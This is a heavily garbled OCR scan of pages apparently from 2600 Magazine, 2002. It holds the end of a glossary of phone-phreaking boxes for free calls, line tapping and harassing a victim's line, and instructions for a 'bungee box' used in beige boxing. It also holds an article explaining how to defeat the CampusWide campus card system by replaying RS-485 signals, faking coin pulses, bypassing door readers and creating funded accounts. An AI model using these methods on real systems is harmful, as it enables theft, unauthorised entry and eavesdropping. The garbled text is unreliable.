being dropped into the coin slot of a payphone.
The traditional Red Box consists of a pair of
Wien- bridge oscillators with the timing controlled
by 555 timer chips.
j Red Box Whistle } [similar to Lhe Red Box]. A
phreak in the Midwest has extensively tested a
method oj red boxing which uses nothing more
than a pair of brass or aluminum whistles. This
method Is very similar to the original blue boxing
as it was discovered by Cap At Crunch Reported
hy The Researcher.
Red Green Box [combines a Red Box and a
Green Box]. This is a device that generates the
tones for red boxing and green boxing. By Pink
Panther.
Ring/Busy Box . When connected to a phone
line, this box will cause a busy signal anytime a
call is made to that particular line. They can sBU
use their phone to make outgoing calls. By
MOrtaSkuld,
{Rock Box - Basic J [similar to the Rock Box -
Advanced, Neon Box, Sound Blaster Box { The
Rock Box channels the music from the stereo out i
to the phone line via the headphone output. It also
can record conversations. Created and designed by 11
Video Vindicator of the Shadows of IGA
/ Rock Box - Advanced/ | similar to the Rock
Box - Basie, Neon Box, Sound Blaster Box] The
Rock Box channels rhe music from the stereo out
to the phone line via the headphone output. It alxo
can record conversations. The Advanced version
has more complex wiring and belter audio quality,
C reated and designed By Video Vindicator of the
Shadows of IGA.
Sand Box. Usage unknown. Cited in the t rim
son Box document. By Dr. D-t ode. Year: 1985 or
1986.
/ Scarlet Box ( (s i mi I ar to I he No ise Bex I, T he
purpose of a Scarlet Box is to create a very bad
connection lr can be used to crush a BBS or just
make life miserable for those you seek revenge
upon. Written and created by The Pimp
Servo Box. Uses R/C car servos to change
lines in poles outside of house. This could be a
nice idea, but very expensive and hard to do.
Silver Box (aka Gray Box? [similar to Solid
Slate Silver Bo\|. The silver box transforms keys
3 f 6 . 9, # to special keys A, B, C\ D,
[Slug BoxJ | similar to the Neon Box). A slug
box is a recording box that slops am! si am, the tape
recorder when a connection is made. Date: May 14
1 990, 10:18 pm.
Snow Box. An underground television trans-
mitter built using commercially available parts.
Not a phreak box. Date: June Id 1988.
Solid State Silver Box (can be shortened as
SS Silver Box) [similar to Silver Box]. This box
Uses an integrated circuit to generate the tones
rather than converting a phone keypad
(SSSilver Box) (short name for die Solid State
Silver Box). See Solid Stale Silver Box.
{Sound Blaster BoxJ [similar to Neon Box.
Rock Box]. A device that adds a normal jack inter-
face to a telephone, allow ing the sending of music
or tones into the phone line, or the recording o]
conversations using The microphone input of a
recorder. Better than a Neon Box, By Shad-
ow Hawk Date: March 31 1994.
Static Box . Tins box keeps the voltage regu-
lated so that you can avoid static. This allow a
more stable line for high speed modems (which at
the time meant 2400bps). In a certain way it’s the
opposite of boxes like the Noise Box. Created by
The Usurper and The Raver of the i ords of Twi-
light- Date: Originally released on November 21
Spring 2002
Page 19
1986, Second release on December 27 1987.
Switch Box. With the Switch Box you cun put
one or both phone tines on hold with visible indi-
cators of each lines status, conference call with
two people, change a phone from line 1 to line 2 ,
and lastly, make one phone line physically dead to
the outside world. By Autopsy Saw.
Sword Box , The sword box is just essentially a
Bud/Beige/ Day-Glo Box with enhancements and
modifications, i he structural differences in the
Sword Box make it better however, and thus safer
for you to use. By Grim Reaper/$TS. Date; No-
vember 22 1 987.
Tan Box ik\ not the short name of the Tanger-
ine Box, which is a different box). It allows you to
make recordings from a phone fine, and it writ
only record once the victim’s phone is picked up
U s like a Neon Box combined with a Beige Box.
Tan Box (2) { it s not the shon name of the Tan-
gerine Box, which is a different box). It serves as a
phone ringer. You have two choices for ringers: a
piezoelectric transducer (ringer) or a standard 8
ohm speaker
(Tanger Box) (short name for the Tangerine
Box), See Tangerine Box.
Tangerine Box (can be shortened as Tanger
Box. Can't be shortened as Tan Box, which is a
different box). Enables you to plug ii in, then listen
to the conversation, without them hearing a click
or anything... plus a jack for headphone, or tape.
By Happy Harley.
(Tap Box) (another name for the Lunch Box).
See 1 umch Box.
[Three Box j [similar In Brown Box, Party
Box, Con Box], Use one line, another line, or both.
Like a Con Box, but better because it uses LEDs
lor which line you are on.
Tran Box (similar to Power Box], Ii will pul a
reverse phase signal on the line and cancel out the
other phase and put a reverse phase signal running
everything in the house. It should make the elec-
tric meter run backwards, Not a phreak box By
Pure Evil.
Urine Box (aka Zap Box). It basically creates a
eapacitative disturbance between the ring and lip
wires in another’s telephone headset. By Wolf-
gang von Albatross of the U nderground_E I ite.
Date: March 2 1986.
V-Box. Detect v oil age changes in phone lines
(used for taps).
Violet Box . This box allows calls to be made
from payphones with just one coin, keeping ihe
line from being released when time is up, I he au-
thor was going to tail this ihe " Yellow. Violet and
Brown Box" but then decided that name w as too
long so he stuck to just violet because it sounded
nice. By The Kez*
White Box. Turns a normal touch tone keypad
into a portable uni i. This kind of box can be com-
monly found in a phone shop,
[White Box (2)] l similar to Crimson Box,
Green Box (2), Orange Box, Hold Box, Hold Oil
Sox, Yellow Box (2)j. A hold burton. See Crimson
Box,
White Gold Box. A While Box and a Gold Box
combined. Created by The Traveler.
Ye How Box. This box can switch a payphone
from working to out of order and vice versa. By
Captain Hook. Date; February 3 1986 - 5:47.
/ Yellow Box (2)\ [siiuila to Crimson Box.
Green Box (2), Orange Box, Hold Box. Hold On
Box, White Box (2|). A hold button. See Crimson
Box.
(Znp Box) (another name for the Urine Box),
See Urine Box. The scheme and description is the
same for the urine box. but is s attributed to an-
s >tb e r uu thor. By KiLLg Ore fmu t [BUI ,gc ] .
— Over the years, wo ve managed to get a lot of eorpora-
^ ons ' agencies, and entire governments very angry at as
A for the things we print in the magazine or the web site.
Ife become dit’licult for us to keep track of all the legal
threats we've gotten , So we decided to stick it ah on a
u shirt so nobody would forget.
I . ^ I The from of the shirt is a graphical image of our eon-
linuing ride through the streets of Corporate America.
EggfW i JyAhl t 7-
mi const ant I v ait rac ting the attention of enforcement agen-
^cies of all sorts. On the back you'll find a conceit tour
=••• ^ l 1 --- >tvlc listing of the various legal threats and lawsuits
we've faced. Gel yours soon before we have to add more
•w TV':. , \ _ ^ ' T J
\ * | i h reals and make the print smaller!
Order through our online store at store. 2600. eom or send $18 (US $22 overseas) to
2600. PO Box 752. Middle Island, NY 1 1953 USA. Indicate your size (L, XL. XXL)
- m
— T
Page 20
2600 Magazine
by Captain B
The principal and construction of this box is
quite simple. You’ re modifying a phone handsel
cord for use as a line cord. All you will need for
making this is a wire culler (or wire cm ter/s trip-
le n and modular crimp tool Radio Shack sells
both, bm you can also find the modular crimp tool
at other places that sell phones and phone acces-
sories. Radio Shack sells two different modular
crimp tools. The only difference is that the
cheaper one ($9.99) has no wire cutter and only
crimps RJ1 L 14, and 25 (one. two, and three line)
modular plugs. Hie more expensive one ($29*99)
has a built in wire cutter and also crimps plugs on
RJ45 [four line) modular plugs. As long as you
have a wire cutter, you don't need to drop $30 on
ihe more expensive crimp rook
It should l>e noted that some phone handsel
cords have four conductors inside, while others
have two But unless you’re going to use a two
line phone, the cord won't need to have more than
two conductors. Take a phone handset cord and
look first at (lie hide wires in the plug to observe
for the color scheme f thus making note of the cor-
rect polarity ). Then cm off that handset cord plug.
You could do both at once, but you might lose
track of the correct polarity. To simplify, do one
end of the cord at a lime. Try to cut off the plug as
close as possible with where it connects to the
cord. Take a [wo line (RJJ4) modular line cord
plug and crimp it on the handset cord facing the
same way as the previous handsel cord was. (In
other words, if the tittle spring clip on the handset
cord was facing down, crimp the line cord plug
on facing the same way as that was.) To crimp,
first push the line cord plug over the end of the
handset cord as mentioned, then insert that end of
the handsel cord into the modular crimp tool
properly, and squeeze the handles together firmly
until it stops {which is quite fast). Sec the instruc-
tions that came with the modular crimp tool if
you need more help.
After crimping a line cord plug on one end oi
flic handset cord, you have only to repeat the
same process for the other end of the handset cord
and you're done- If you messed up on the polarity
at either end. it should still work, but keeping po-
larity correct is the right way. As long as you're
eaircftt ! , and work patiently, it’s a piece of cake.
I think the bungee box is great for beige box-
ing purposes, because when phreaking out in the
held, you don't want a tangled mess of lifte cord
to have to disconnect and qore away when you
have to get out of the scene in a hurry. It should
be mentioned that another way to accomplish this
is to use a retractable line cord. It comes in its
own circular ease. These can be bought either
from Radio Shack for $19.99 or Home I tepol for
about SI 5. i he one from Radio Shack is 12 feet
long, the one from Home Depot is 16 feet long
{according to the packages). Have plum,
AU credit for the name of this box goes to icOn
nfLPH.
A( long last, our documentary film
"Freedom Downtime" is available
on videotape. This is. the story of ! |
ihe Free Kevin movement, our trip
across the United States to talk to
people involved in the Kevin Mri-
niek affair, and our attempts to
Tjjpeople behind
a major motion pic-
fdsotit ps spreadvlies
II h ^ -JW9 H ML* I about Kevin to moviegoers every-
TwMBMl*"- where.
VHS NTSC format, 121 minutes.^
Order through bur online store at store.2600.com or send $20 (US $23 overseas)
to 2600, PO Rox 752. Middle Island. MV 1 1953 USA-
Takedown
Spring 2002
Page 21
by Acidus
CampusWide is the mostly widely used card
access system in America today, It sadly is the
least secure, CampusWide is an ID card sdhmorr-
originajly created by AT&T and now owned by
Blackboard. U is an ID card that can he used to
purchase things from vending /laundry machines
or the college bookstore just like a debt card. It's
used to check out books from libraries, open com-
puter bibs and buildings at night, gain access to
parking decks, and even get you into sporting
events. The CampusWide system gives everyone a
card that Sets them access both unattended and at-
tended card readers and Points of Sale. All these
actions and transactions are sent to a central server
which stores all the information in a database A
confirm or deny signal is sent back so the card
reader
Back in the day (last ten years), there were two
major card systems available to colleges: AT&T's
CampusWide system (also known as Optijn900O)
and (college's Envision. Envision was one of the
first card systems ever made. The seeds of the cur-
rent Envision system go all the way back to 1984
with a company called Special Teams. The original
engineers from Special Teams went through sev-
eral companies, each one being bought by another
company every year for several years, before they
came to leol lege, AT&T saw the market for card
systems and jumped into [he mix as well stealing
some of the ideas behind the system by hiring de-
velopers of Envision away from [college. They re-
leased a system known as CampusWide, It is
commonly called Opt ini 9000 or OneCard, how-
ever I will continue to call it by its most well
known name, CampusWide So why do you need
to know all this history? Because the core of all
modem card systems is based entirely on 1984
technology! The original engineers from Special
Team and people trained in their ideas have been
the only people in the country designing and build-
ing these things. That means that the weaknesses
in the reader/server infrastructure that 1 point put
here are found in every card system made in the
United States in the last 15 years! By the mid to
late 90 's CampusWide held the largest market
share Then in November 2000 P a newly formed
company called Blackboard purchased both Fin vi-
sion and CampusWide. It sells both systems under
the names Envision and Optim90QG, Blackboard's
first order of business was to upgrade the two sys-
tems to use newer technology, only to learn that
they couldn't! Too many colleges and even busi-
nesses had I he older equipment and Blackboard
couldn’t afford to drop compatibility! They have
tried to merge older and newer technology in an at-
tempt to improve security i with the addition ot II 1
converters y, but in truth, they have weakened an
already frail system.
T he Campu sWide system is the most prevalent,
and my to spot. The readers are black metal or
plastic, almost alt have an LCD screen, and they
have no writing on them except for the AT&T logo
with the word AT&T" under it The newer Black-
board ones work exactly the same as the AT&T
ones, only they have Blackboard written on them.
Information on (he CampusWide system was very
hard to find. I started lot? king right after AT&T
sold it when they were clearing out their old web
pages and Blackboard was still creating their web
pages. Needless to say, AT&T had much better
documentation of the specs ol the system than
Blackboard does. Sadly, all of it is off AT&T's
page now and you’ll have to hurry to still find it
cached on Google. Luckily I saved everything, and
should post it up soon.
The Server
Thu CampusWide system is recommended to
run on Hi *9000 machines, though any RISC
p roe ess n i will do. h only runs on HP-UX (Black
hoard currently installs ver I Lx). The AT&T sys-
tem had a list of specs that the end users had to
have to support ihe software. These included the
above, but also a four gig capacity Digital Audio
Tape and a UPS (hat could keep the system up for
20 minutes (Blackboard's newer specs suggest a
Best Fcrrups 1 .8 KVA battery that can go for 45
minutes). More interestingly, the CampusWide
system is required to have a 9600 bps modem for
remote diagnostics, i he system itself consists of
two pans: The Application Processor (Alb and the
Network Processor (NP). The Application Proces-
sor is ihe back end of Campus Wide, the part the
users never see. It manages ihe database where all
the information is s lored and provides an interface
for human operators to look at logs and run re
ports, as well as change c on I tgurat ion/ privileges
and transaction s/account maintenance. The NP is
the gateway from the infrastructure to the AP. Er
lakes in (he requests from readers around campus,
converts the mode of communications into com-
mands the AP can understand, and then passes it.
along. AT&T CampusWide could support up 60
communication lines and 1000 card readers. The
new Blackboard system allows up to 3072 readers.
The Database
Alt the information about a student or em-
ployee isn't stored on the card for security reasons,
it’s stored in the database (the card simply has an
account number which is used to organize the data
in the database). The database used by the current
Blackboard system fa db Vista. The database for the
Page 22
2600 Magazine
AT&T version was never advertised by AT&T bui
was believed to be Informix. However* based on
the modular design of CmupukWkie, 1 believe any
SQL queried relational database should work. The
database is most likely not encrypted or protected
ut any way otba than by isolation. The only way
to get to it is either at the console of the APor by
the commands sent from card readers that have al-
ready passed through vhe NP Blackboard's as-
sumption that these two ways of reaching the AP
are secure is one of the system's downfalls. The
database can store up to 9,999 different accounts*
each account having many different holds. The
balance the person has and the doors he can open
are included in the system. The balance will be a
lloatine point number* and the doors the person
can open will most likely be a string of characters,
with the bits being used to tell which doors he can
or can t open The doors are most likely grouped
into /ones* so that the five doors into a building
have one bit instead of five separate hits saying
whether the person can open those doors or not.
This idea is upheld by Lhe fact that Blackboard
says the users are given plans and they can be up-
dated regarding their access to buildings. These
plans grant different levels of security access to a
building. Lower levels can get into the building
through all the exits, the next level can access labs
on a certain Moor. etc. Without direct inspection of
the database, only educated guesses can be made
about its structure. (I have totally left out any pro-
visions for checking out hoofed and other things lhe
card can do, )
The Workstations
Tlie AP was interfaced originally by the AT&T
system only at the server console, or through dumb
terminals connected to 19.200 bps serial lines. To-
ward the end of the AT&T days and now with
Blackboard changes to someone's security privi-
leges can be made from any workstation on cam-
pus. I watched ibis process several times. A certain
software package was used to connect through
TCP/IP to the AP. ( I saw lhe name once* briefly,
and for some reason 1 thought it wa s Osiris.
Checking on this name has turned up no results.
Perhaps this is a proprietary piece of software spe-
cific to m> college* or simple a closely guarded
software package from Blackboard.) A GUT was
used to select my name from a list of students, A
summary of my security privileges then came up.
and the ability to add and remove these was there
as well. This GUI was incredibly user friendly* as
ihe man udng it had nil computer knowledge. I
i ' nly got to watch a few people having new secu-
rely privileges activated, and never got to use it
myself* so 1 have no way of knowing if the debt
balance can be aceessed/c hanged from this GUI.
The Card
The ID cards that are used are your standard
\.NSI C’R-KO mag stripe cards. JThcy arc made of
PVC and are 2J25 by 3.375 inches. They are
made on site at ihe college \ "card station." and
normally have a photo ID on them. A 300 dpi
photo printer is used and the company recom-
mended by B lack board is Polaroid (just like the
printers at the DM V ) The magnetic stripe on the
card is a Standard American Banker Association
(ABA) Track 2. Any card reader/capture tool can
read these cards. The cards are encoded on high
Coercivity stripes (known as HiCo), which are
very resistance to wear and tear. These cards only
use Track 2 of the card which is read only. It is in-
teresting that they don't use Track 3 which is
read/write. Track 2 > s information breakdown is as
follows:
Sum Sentinel = / charm u>r
Pri nm ry A t Ct tank N unite r = up U > 1 9 t ha ra t ti- rs
Separator = / character
Country Ct rde - 3 rha mete rs
Expiration Date or Separator -- f or 4 characters
Junk data -fids the card up to 40 characters
IJiC ( Longitudinal Redundant \ Check = ( char-
acter
As you can see, most of this applies to banks.
However, the account number I have stamped on
my Campus Wide card is lb characters long* so the
Primary Account number held is known to be
used. < TmpusWidc also vTlows for lottl cards. IV a
card is lost, an entry is made in that person’s table
ill the database* the last digit of the account num-
ber is increased by one (this is called the check
digit - so of the ]6 digit account number 1 have, ihe
first 15 digits are my number; the 16th digit is Lhe
check digit). The old card that uses the old check
digit is deactivated and a new card is printed.
The Infrastructure
The infrastructure is a security through obscu-
ri t y " pi oy o f t b e sy st em . C > r i gi n a lly lhe s y s le n i Was
designed to run over several RS- 485 drop lines.
(These are the 60 communication lines mentioned
before ) RS-485 is a very robust means of trails
mining data. (The whole Campus Wide system is
designed to take a beating.) Unlike RS-232, which
has a protocol built into the standard that says how
devices must talk to each other (stop bus, baud,
handshaking* etc*}, RS-485 has none of that. It a
Way for a master device dial sits at the end of a
communication line to talk to slave devices that
are daisy chained on the line. The Campus Wide
system uses the full duplex version of RS-485
where slaves can speak to the master before the
master polls them for data. (Campus Wide needs
Mbs ro have the sub-seconds Limes they advertise.
Spring 2002
Page 23
However, the NP still polls all the readers on a reg-
ular basis and ean be interrupted by a reader when
a transaction comes in.) The data lines are very ro-
bust against noise and interference. RS-485 has
two lines in each direction, called A and B. Data is
sent by having a difference an the voltage of A and
B of more than five volts. This mean that if you
have a signal being sent and A is at 10 volts, B is at
15, and a power spike comes along, the spike will
boost both voltages by the power of the spike.
However, the difference between the higher power
A and B will still he five volts and the data is not
corrupted. Over short distances, speeds of 10Mbit
can be achieved, f low even the longer the cable is,
the lower Lite speed. All Cam pus Wide card readers
operate at 9600 bps, thus making the maximum
distance of the RS-485 drop line 4KX) feet at that
speed. This can be extended through the use of re-
peaters and boosters on the iine. RS-485 is very
common in the industry, but secure" at a college
since it is unlikely anyone would have a means of
interfacing to it. Commercial RS-485 to RS-232
converters are available and prices range from $50
to a few hundred, V t IDL designs of these converts
can be found on the Internet, and thus an FPGA
could be configured to decode RS-485 signals.
While researching I came across a post from some-
one claiming to be a field tech for some company.
He said that you could make an RS-485 to RS-232
converter very easily bv w iring:
RS-232 Xmii =* RS-485 RX
RS-232 Rvcd = RS-485 TX
No one posted after him to say he was wrong. 1
don’t know if it would work, since the second wire
of the pair of RS-485 data lines isn’t even men-
tioned, and it's the difference between these two
lines that sends the data. Also, the possibility of
high voltage on an RS-485 line could easily dam
age a serial port on a computer, if not fry the moth-
erboard. Also, this assumes the data scheme used
to transmit data on the 485 line is identical to RS-
232. Phis doesn't have to be true, since the way
data is represented ( m packets, streams, stop bits,
parity, etc.) is not defined by RS-485. It you could
get to the data streams, you have no idea what the
scheme used to represent it is, and thus how to de-
code it. This last problem however, is moot, as you
will read in the Exploits section,
AT&T would recommend that these lines be
used (indeed all the readers can only transmit their
data iii RS-485 mode), however the data can travel
over any facility from telephone lines to radio
waves, provided that full duplex 9600 bps asyn-
chronous communication can occur on them. The
NP is the part of the system that would sort all this
out. AT&T did however specifically say that using
an existing Ethernet or computer network was not
a good idea, as it sent I he data out into the wild,
and would slow down both the Campus Wide sys-
tem and the existing computer network. However,
Blackboard now offers an IP converter This de-
vice is a simple computer (it has a Pentium class
processor and a standard off the shelf NIC Card)
that takes in 16 different RS-485 devices, converts
all their communications into TCP/IP packets, and
encrypts them to send over the network. The NP
(hen has a converter at its end that converts the
packet back lo RS-485 format. The IP converter is
assigned an IP address which is most likely a static
address. The IP converter also most likely has a
daemon on it you can telnet into lo look at the sta-
tus and perhaps change configuration info. Black-
board says l he data from these boxes is encrypted
and die box certainly has the power to crunch
some numbers. 3 iowever, I have found that if en
eryptton is good, then companies will brag that
about the key length, etc. The only data Black-
board gives about the encryption is that the keys
can be changed automatically at any interval from
the AP.
For the longest time at my college if an off-
campus food joint wanted to have the student he
able to use their school cards to pay for food, they
had to pay For an expensive leased line that con-
nected them to the school. It's my guess that this
was the RS-485 line or something similar. Re-
cently (in the last six months) my college offered
cheap ( less than $300) boxes to nearby pizza joints
that would allow lor payment w ith a school card.
These boxes were simply card readers with
modems installed, much like a credit card valida-
tor. These modems are dialing the NP directly!
Major security risk !
The infrastructure ends up like this. All the de-
vices in a building send their lines into one place in
the budding. This is where multiplexers exist
which split the main RS-485 drop line up into
slices tor each reader These multiplexers also can
boost the power of the main drop line, letting it
travel longer distances. They can be stored in a
locked networking closet or in these big metal cab-
inets on the wall of a room. AT&T called these
MW/MHWMKNC - Wall Mount Enclosures. This
metal box has a handle and a lock, but the front of
the handle and lock assembly has four Mat head
screws. J used a cheap metal knife and opened ihis
locked box Inside I found the LCM (Laundry
Center Multiplexes) that controlled the laundry
room 1 was in. Everything had "AT&T Cam-
pus Wide Access Solution” written on it. as well as
lots of Motorola chips. Sadly, this was early in my
investigation, and 1 haven't gone hack to look
again.
The drop lines coming to the building can be
traced back ail the way to the building that houses
the NP There the NP interfaces with the AP to op
prove or deny transactions.
The Readers
Every reader imaginable is available to a col-
lege from Blackboard. Laundry readers, vending
machine readers, Point ol Sale (PCS) terminals in
the campus bookstore, door readers, elevators,
copiers, football game attendance, everything!!!
All of the readers communicate using RS- 485
lines, and if any other medium is used bet ween the
reader and the NP {such as TCP/IP networking by
Page 24
2600 Magazine
way of the IP converter), ii must be converted back
to RS-4K5 at the NP S since all CampusWide uses
that standard Everything is back wands compati-
ble. The majority of my college campus has AT&T
readers on them, though a lew new Blackboard
readers are showing op.
Readers can he broken into three categories:
security, self vending, and POS.
Security readers are made of high density plas-
tic and consist of a vertical swipe slot and two
LEDs They are green when they are not locked
and reel when they are. When you swipe, a card to
open a door you are cleared for, the light will
change to green for around 10 seconds. If the door
has not been opened in that time, it locks again. To
allow for handicapped people who may not be able
to get to the door vw tinvt. a pices imity sensor is
available to receive signals from a key source to
open the door. Information about vvhai frequencies
are used to control the door are obviously not pub-
lished by either AT&T of Blackboard. There is also
a model ol door reader with both a swipe and a 0-9
keypad for codes. \ have encountered no such
model and have no idea how it works. Advanced
forms of these three security readers are available
which have the ability to have a local database of
4,000 (expandable to 1 6,000) account numbers
stored in NVRAM. This way if for some reason
the card reader canT reach the NP to confirm
someone's identity, then the reader can check its
local records. The tricky bastards also built the
readers so there is no visible difference between a
reader that can’t reach the N P and one that can.
The self vending machines are the most color-
ful group They are the best to hack because they
arc unattended and work 24/7. They vary in size
Spring 2002
and shape, but all have several fundamental fea-
tures. They all have an LCD screen of some kind.
I he most common being 2\I6 characters . Most arc
mounted to walks and the povver/data lines are pro-
tected by metal conduit. Coke readers are mounted
on a Coke machine where the dollar bill acceptor
would go. Of this group one stands out: the Value
Transfer station! Unlike the GUI at the worksta-
tions * this reader can direct to query about the ac-
count balance of the cardholder and add money to
it as well (by feeding in dollar bills like a change
mac h i ne ) . In add i ti on, it di spe n se s te m porary P VC
cards that can be credited, so people can do laun-
dry, etc. if they forget their card. This means that
this station can leh the AP to create a new account
and give it x number of dollars!
Final!) there arc the POS devices, A student
would never get to use these, they are used in
cafeterias and bookstores. They allow for payment
by the student ID card and several other options.
All these readers have inherent similarities.
Most are made from high impact plastic or metal.
If ii 3 s wall mounted, there will he metal conduit
running out of the top which holds the power and
data lines. All have their program code on
ROM/NV-RAM chips. 1 once managed to power
down a card reader for :i copier. When I turned it
back on, it ran through several self tests in the span
of a few seconds. I vaw messages on the LCD that
said things like "ROM ver" and CRC check com-
plete," AT&T and now Blackboard say all the read-
ers, including POS, wdl power up to full operating
status without any user input in a maximum of 20
seconds. All of these readers can store swipes of
cards and transactions in their local NV RAM until
it can reach the NK and through it, the AP to con-
firm the transaction While disconnected front the
NP, the readers show no warning lights or anything
like that. Some readers, such as the security read-
ers, can be wired to a UPS to keep areas secure
even w hen the power goes out.
A Simple Transaction
Let s run through a simple transaction. I am at a
laundry reader, I tell the reader with a key pad
which washer I want to use. Let's say 1 choose t 4.
1 then swipe my card. The reader sends a signal
that contains the account number bind she amount
of my purchase and most likely nothing more) to
the NP through some medium (most likely it's a
straight R5-4S5 line, but an IP converter could be
installed by the university). The NP decodes the
data out of the RS-485 line and parses it into com-
mand 1 - the APcan understand. The \P uses the ac-
count number to pull up my account and checks
the balance against the amount requested. It then
either deducts the money from my account and
tells Ihe NPto send an OK signal, or to send a deny
signal along with the new balance of my account,
The jN P forwards the reply back to the reader, and
the reader (if it got an OK signal) sends an elec-
tronic pulse to the coin tester inside the washer C4
and tell it that $.50 was received. The washer is re-
tarded for all it knows [ put $.50 m it with coins.
Page 25
and it gives me a load.
The Exploits
Did you see the problem with the above scenar-
ios? There are several ways to cheat the system. It
] can record the its OK Lo sell it to him' 1 signal
from the NP to the reader and play it to the reader
again. I will get another load of wash. Also, if I
could get to the wires that go from the Coke reader
to inside the Coke machine that send the coin
pulses, 1 can make the Coke machine think money
has been paid, I have looked at Coke machines
with these Coke readers. Out ihe back of them they
have an RJ 1 1 jack (though it will have RS-4H5 sig-
nals on it). All 1 need is a converter and ll laptop
and I can trap the signals back and forth between
the reader and the NP. You don’t even need to
know what the data scheme used on the RS-485
line is, just send to the reader what you intercepted
front the NP and it w ilt work. It is even easier if
the traffic takes place over a TCP/IP network. If I
learn the IP address of the IP converter. 1 can sim-
ply send packets to it from anywhere in the world
(provided 1 can telnet into the college's TCP/IP
network) that contain the RS-485 code to spit out a
Coke! You can fool door readers as well if you can
get to the wires that go from the reader to the mag-
net holding the door shut. Just send the correct
pulses, this system is horribly insecure because
you can completely bypass the Campus Wide inter-
face: The Value Transfer Stations are even worse.
They have the ability to make the AP create a new
account and set a starling balance of any amount.
Just gain access Lo the RS-485 lines, record the
traffic to and from the NP while you are getting a
temporary card, and you have the system to create
and alter debt accounts.
With a system like this, you would think that
the RS-485 lines would be protected with massive
security. They aren't. Metal conduit protecting the
lines commonly stops at the hanging ceiling. Value
Transfer Stations routinely have their bac k s acces-
sible from janitor or utility closets, which are
rarely locked The 485 line literally comes out of
the back of a coke machine unprotected. The flexi-
ble piping that carries the coin w r ires from the laun
dry reader to the washer are secured to the back of
the washer with flat head screws. It is pathetically
unprotected. T he phone numbers the modems dial
from off campus eateries are easily socially engi-
neered out of the minimum wage workers there,
and they let you dial directly to the NP. Or you
could simply find the range of telephone numbers
of the building that the card system is housed in
and wardtal it The AP is required by Blackboard
to have a modem for diagnostics. You could steal a
copy of the GUI of a computer and then edit peo-
ple’s privileges to your heart’s content. And even
worse, the Envision system is exactly the same as
Cam pus Wide, except it uses a Windows NT/2000
machine using Oracle as its database. Every flaw- 1 1
mentioned will work against Envision as well.
Hell, both systems even use the same readers! And
there is no fear of having any of your actions
logged. Once you trap the RS-485 signals from the
NP to She reader, just play it back to the reader
whenever. The A P never knows you are doing any-
thing and thus doesn't log it, and the reader as-
sumes that any data it gets must be secure. Now
tell me this. The next rime you swipe a Cam-
pus Wide card to get into a football game, how do
you know' someone isn't trapping the data and cre-
ating a copy of your account onto a card from a
hacked Value Iran sic r Station? Hopefully this arti-
cle will force Blackboard to change to a more se-
cure system.
Thank m to Jitn at Blackboard for ail the techni-
cal info , and various websites like rs485.com,
google, coni k cached webpages, and how stuff -
works, com.
Exchange Carriers). The "Incumbents" are the
guys who were around since before the breakup
ot AT&T, while the "Competi fives'' are the new
guys on the block who are supposed to help keep
the old guys "honest" and force them to keep raLcs
competitive. The guys who carry your conversa-
tions as a long distance call are IXC’s (IntereX-
ehange Carriers).
As an old "phone phreak." it s almost embar-
rassing that I should have to admit that my "day
job" is that of a Directory Assistance (DA) opera-
tor for a major Long Distance Carrier ilXCk It
Page 26
2600 Magazine
doesn't matter which one because 1 don I really
work for them anyway. In these modern days of
deregulation, I work for a third-parly outfit that is
hired to provide the DA service cheaper than they
can do the job in-house. 1 hat's because I live in
one of the numerous "Right-To-Work" Mules in
the nation's sun-belt, and get paid pittance.
One of the major embarrassments of my job
happens when someone calls for the local phone
company - not just in a small town, hut even in
major cities! The phone company never puts itself
in the directory so it can he found! And of course,
i only handle While Pages. If the caller doesn't
know the name of the telco. I’ m not allowed (by
FCC tariff, I’m (old) 10 provide a Yellow Pages' 1
search. I keep threatening to fake some vacation
time to visit die reading room of (he FCC m
Washington some lime and look this stuff up. but
1 really can’i afford the trip (see comment on
Vl K ight F i Wor k " st at e abo ve i ,
Since I cover a number ol states in my job. I
gel to look at the listings of a number of major
TEC's. Verizon will have Verizon Wireless” list-
ings for every hamlet and burg in the nation - but
try to bad a number tov residential land -line ser-
vice that an out of suite caller can ring up to see
about the problem with Aunt Minnie s account
back home, and I'm up against the tariff asking
Do you I' now the name of the phone company in
i hat area 7 Even when I break down and suggest
that Verizon as the primary local carrier in Boston,
or Amen tech in Chicago flipping lhai this isn’t
one of the calls being 'monitored for Quality As-
surance"), jusl what number am 1 supposed to
supply? Deregulation began in 198-6 wash the
Modified Final Judgment. Here l am in the next
century wondering what I'm supposed to tell a
customer who's on their third call to Directory
Assistance looking to gel a phone account
squared away!
People call in w ith the most compelling stories
about how their elderly aunt back home in
Chicago or Boston can't deal with their phone
company any more, and they need to call and take
care of the charges. Or somebody in (he Rust Belt
up north is trying to reach the telco of their winter
home in the South to deal with a problem on their
bill. It isn’t that I've got the time to stop and listen
(n their stories, it’s shat I can't shut them up while
Lr> i n g i j > scare h t he m a n y ree u rre nee s of l he D i -
rectory Sales Office numbers while trying to find
a listing for an out of ^tate. caller to call.
The l rick here is that she phone companies
have all their information about contacting them
packed in the front pages of (heir local telephone
directories. In over 15 years of deregulation, it
hasn’t occurred to most of them to advertise in
their own Yellow Pages under "Telephone Com-
panies" or to put in as big a listing in the White
Pag es as their HI ectri c Cr >m pa r \ y uLilit y bre 1 1 i ren
the ones they keep passing in the halls of the Pub-
lic Service Commission offices but never need to
talk to. Keep in mind that the telephone book pub-
lishing arm of those same phone companies have
been "spun -off so the right hand really doesn't
know what the left hand is doing because it isn't
its own left hand any more!
The other problem is when callers call am of
state DA at N PA-555-12 12 ( N PA is "Numbering
Plan Area.' 1 the telcos in-house term for Area
Codes A the White Pages listings are nevet dear
us to where an out-of-state caller should call about
discussing a bill. Actually. 1 should compliment
BellSouth here. They actually do have a specific
number for ou\-oCs\att callers to dud. Let me i ell
you why.
The number in most BellSouth states to reach
the telco for residential customers is 7H1J-2355
(78U-BELLk It’s always u local number wherever
vou call from, and if you live in an area that has
» 4
10-digit dialing, you have to use your area code in
front of thai number to get there. The number is
never good from out of state, but most of my col-
leagues" in the Call Center don'i know this and
give ii out - causing much frustration when the
culler calls back to complain and gel a good num-
ber. It’s a toll free number, and clearly marked
"out of state" but most callers don’t want the "loll
Free Number Runaround ." They want a "direct
number." then gel the recording that the number
hi the 780 exchange is not valid
So how does a telco go about changing the
listings m tile directory database lhai I (and my
600 friends in my call center) use every day? Do
what we tell people who call wondering why their
number isn’t in our directory: "Call your Local
Phone Company, and make sure they have your
listing correct. Our information is updated from
the information lhai they provide lo ns."
So there it is. Get with it. you telcos! Get your
act together and pretend you're "jusl another
American company." Even vou need to check
Vour company's telephone book listings once in a
while, M ike sure your customers can find you
when they call Directory Assistance, whether
they’re in town or across the country - jusl like
every other company has to. Otherwise, your cus-
